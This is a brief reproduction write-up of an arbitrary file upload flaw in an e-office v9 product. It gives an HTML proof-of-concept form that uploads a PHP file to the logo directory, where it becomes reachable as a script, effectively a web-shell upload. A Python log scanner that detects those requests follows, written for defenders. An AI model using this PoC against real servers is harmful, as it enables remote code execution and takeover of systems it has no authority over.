Reproducing an Arbitrary File Upload Vulnerability in a Certain E-Office v9
POC
<form id="upload-form" action="http://xxxx.com/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo" method="post" enctype="multipart/form-data">
  <input type="file" id="Filedata" name="Filedata" />
  <br />
  <input type="submit" value="Upload" />
</form>
A successful upload returns:
logo-eoffice.php
Access URL: /images/logo/logo-eoffice.php
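
For defenders, the two requests above leave a recognizable trace in web server logs: a POST to the upload endpoint with uploadType=eoffice_logo, and a request for a script file under /images/logo/. The following is an added detection example, not part of the original write-up; it assumes combined-format access logs, and the sample lines, addresses and timestamps are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format assumed); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo HTTP/1.1" 200 17 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /images/logo/logo-eoffice.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2024:10:02:00 +0000] "GET /images/logo/logo-eoffice.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2024:10:03:00 +0000] "GET /general/index/UploadFile.php?m=uploadPicture&uploadType=theme HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_PATH = "/general/index/uploadfile.php"
LOGO_DIR = "/images/logo/"

def classify(method, target):
    """Return a finding label for one request, or None if it is unremarkable."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(parts.query).items()}
    if (method == "POST" and path == UPLOAD_PATH
            and "uploadpicture" in query.get("m", [])
            and "eoffice_logo" in query.get("uploadtype", [])):
        return "logo-upload"
    # A script extension served from the logo image directory is never expected.
    if path.startswith(LOGO_DIR) and re.search(r"\.(php\d?|phtml|phar)$", path):
        return "script-in-logo-dir"
    return None

def scan(log_text):
    """Return (findings, clients that produced both finding types)."""
    findings, seen = [], {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        label = classify(method, target)
        if label:
            findings.append((client, ts, label, target, int(status)))
            seen.setdefault(client, set()).add(label)
    both = sorted(c for c, labels in seen.items() if len(labels) == 2)
    return findings, both

if __name__ == "__main__":
    hits, correlated = scan(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print("clients with both upload and script request:", correlated)
```

A client that appears with both labels is the strongest signal; either label alone still warrants checking the contents of the logo directory on disk.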